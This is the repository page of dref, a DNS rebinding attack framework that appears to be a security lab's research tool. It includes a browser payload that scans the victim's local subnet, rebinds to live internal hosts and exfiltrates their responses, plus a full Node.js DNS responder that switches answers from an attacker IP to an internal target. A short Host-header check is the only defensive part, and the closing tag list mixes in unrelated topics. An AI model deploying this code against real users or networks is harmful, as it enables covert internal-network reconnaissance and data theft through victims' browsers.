ReversecLabs/dref

GitHub: ReversecLabs/dref

An automated DNS rebinding attack framework: by controlling DNS responses and shipping built-in JavaScript payloads, it bypasses the Same-Origin Policy in the victim's browser to scan internal-network services and exfiltrate data.

Stars: 492 | Forks: 70

DNS Rebinding Attack Framework

This project is no longer maintained. dref does the heavy lifting of [DNS rebinding](https://en.wikipedia.org/wiki/DNS_rebinding). The snippet below, taken from one of its [built-in payloads](https://github.com/mwrlabs/dref/wiki/Payloads#web-discover), shows the framework being used to scan the local subnet from a hooked browser; once live web services are identified, it goes on to exfiltrate their GET responses, [breezing through the Same-Origin Policy](https://github.com/mwrlabs/dref/wiki#limitations):

```javascript
// mainFrame() runs first
async function mainFrame () {
  // We use some tricks to derive the browser's local /24 subnet
  const localSubnet = await network.getLocalSubnet(24)

  // We use some more tricks to scan a couple of ports across the subnet
  netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
    // We launch the rebind attack on live targets
    for (let h of results.hosts) {
      for (let p of h.ports) {
        if (p.open) session.createRebindFrame(h.host, p.port)
      }
    }
  })
}

// rebindFrame() will have target ip:port as origin
function rebindFrame () {
  // After this we'll have bypassed the Same-Origin policy
  session.triggerRebind().then(() => {
    // We can now read the response across origin...
    network.get(session.baseURL, {
      successCb: (code, headers, body) => {
        // ... and exfiltrate it
        session.log({code: code, headers: headers, body: body})
      }
    })
  })
}
```
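The payload above relies on the DNS side of the attack, which `session.triggerRebind()` hides: the attacker's authoritative name server answers the first lookup of a throwaway hostname with the attacker's own IP (so the page and its JavaScript load under that origin) and every later lookup with the internal target, using a TTL of 0 so the victim's resolver does not cache the first answer. The following is an added example written for this page, not dref's own code: a minimal Node.js implementation of that answer-switching logic on raw DNS wire format, plus the Host-header check that the wiki's limitations page refers to. The IP addresses, the hostname `a1b2.rebind.example.test` and the `hostHeaderAccepted` helper are assumptions for illustration; a real deployment would wrap `RebindResolver.handle` in a `dgram` UDP listener on port 53 for the attacker's zone.

```javascript
// Added example (not dref's code): a DNS rebinding responder on raw DNS wire format.
// Assumed values: ATTACKER_IP serves the JS payload, TARGET_IP is the internal service.
const ATTACKER_IP = '203.0.113.10'; // assumed (TEST-NET-3 documentation range)
const TARGET_IP   = '192.168.1.1';  // assumed internal target

// Encode a dotted hostname as DNS labels: <len><label>...<0>.
function encodeName(name) {
  const parts = name.replace(/\.$/, '').split('.');
  const labels = parts.map(p => Buffer.concat([Buffer.from([p.length]), Buffer.from(p, 'ascii')]));
  return Buffer.concat([...labels, Buffer.from([0])]);
}

// Decode a name at `offset`, following compression pointers (0xC0xx).
// Returns the name and the offset just past the name field as it appears in the packet.
function decodeName(buf, offset) {
  const labels = [];
  let pos = offset, end = null;
  for (;;) {
    const len = buf[pos];
    if (len === 0) { pos += 1; break; }
    if ((len & 0xc0) === 0xc0) {            // pointer: field ends here, continue at target
      if (end === null) end = pos + 2;
      pos = ((len & 0x3f) << 8) | buf[pos + 1];
      continue;
    }
    labels.push(buf.toString('ascii', pos + 1, pos + 1 + len));
    pos += 1 + len;
  }
  return { name: labels.join('.'), end: end === null ? pos : end };
}

// Build an A/IN query as a stub resolver would send it (used here to construct test traffic).
function buildQuery(id, name) {
  const header = Buffer.alloc(12);
  header.writeUInt16BE(id, 0);
  header.writeUInt16BE(0x0100, 2);          // flags: RD=1
  header.writeUInt16BE(1, 4);               // QDCOUNT=1
  const tail = Buffer.alloc(4);
  tail.writeUInt16BE(1, 0);                 // QTYPE A
  tail.writeUInt16BE(1, 2);                 // QCLASS IN
  return Buffer.concat([header, encodeName(name), tail]);
}

// Extract id, qname, qtype and the offset where the question section ends.
function parseQuery(buf) {
  const id = buf.readUInt16BE(0);
  const { name, end } = decodeName(buf, 12);
  return { id, name, qtype: buf.readUInt16BE(end), questionEnd: end + 4 };
}

// Echo the question and append one A record pointing at `ip` with the given TTL.
function buildResponse(queryBuf, ip, ttl) {
  const { questionEnd } = parseQuery(queryBuf);
  const header = Buffer.from(queryBuf.subarray(0, 12));
  header.writeUInt16BE(0x8180, 2);          // flags: QR=1, RD=1, RA=1
  header.writeUInt16BE(1, 6);               // ANCOUNT=1
  const answer = Buffer.alloc(16);
  answer.writeUInt16BE(0xc00c, 0);          // NAME: pointer to the question name at offset 12
  answer.writeUInt16BE(1, 2);               // TYPE A
  answer.writeUInt16BE(1, 4);               // CLASS IN
  answer.writeUInt32BE(ttl, 6);
  answer.writeUInt16BE(4, 10);              // RDLENGTH
  Buffer.from(ip.split('.').map(Number)).copy(answer, 12);
  return Buffer.concat([header, queryBuf.subarray(12, questionEnd), answer]);
}

// Read the first A record back out of a response (what the victim's resolver would cache).
function parseAnswer(buf) {
  const { questionEnd } = parseQuery(buf);
  const { end } = decodeName(buf, questionEnd);
  const ttl = buf.readUInt32BE(end + 4);
  const rdlen = buf.readUInt16BE(end + 8);
  return { ttl, ip: Array.from(buf.subarray(end + 10, end + 10 + rdlen)).join('.') };
}

// The rebinding policy: first lookup of a name -> attacker host, later lookups -> target.
// TTL 0 tells the resolver not to cache, so the payload's next request to the *same origin*
// is delivered to the internal host while the browser still treats it as same-origin.
class RebindResolver {
  constructor(attackerIp, targetIp) {
    this.attackerIp = attackerIp;
    this.targetIp = targetIp;
    this.seen = new Set();
  }
  handle(queryBuf) {
    const q = parseQuery(queryBuf);
    if (q.qtype !== 1) return null;         // only A queries are handled in this example
    const first = !this.seen.has(q.name);
    this.seen.add(q.name);
    return buildResponse(queryBuf, first ? this.attackerIp : this.targetIp, 0);
  }
}

// Assumed defensive check on the target side: after rebinding, the request still carries the
// attacker's hostname in Host, so a service that validates Host against its own names rejects it.
function hostHeaderAccepted(hostHeader, allowedHosts) {
  return allowedHosts.includes(hostHeader.split(':')[0].toLowerCase());
}
```

Running `new RebindResolver(ATTACKER_IP, TARGET_IP).handle(buildQuery(1, 'a1b2.rebind.example.test'))` twice yields the attacker IP and then the target IP, both with TTL 0; the `hostHeaderAccepted` check is why services that validate `Host` (or that a browser pins, as dref's limitations page discusses) are out of reach for this technique.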









See the [Wiki](https://github.com/mwrlabs/dref/wiki) to get started, or [dref attacking headless browsers](https://labs.mwrinfosecurity.com/blog/from-http-referer-to-aws-security-credentials/) for a practical use case.

This is a development release - do not use in production.

Tags: CMS security, DNS rebinding, HTTP request smuggling defense failure, bulk IP address handling, JavaScript, SOP bypass, web security, internal network reconnaissance, Same-Origin Policy bypass, subnet scanning, plugin system, data visualization, data exfiltration, statistics, port scanning, network security, custom scripts, blue-team analysis, reverse-engineering tools, privacy protection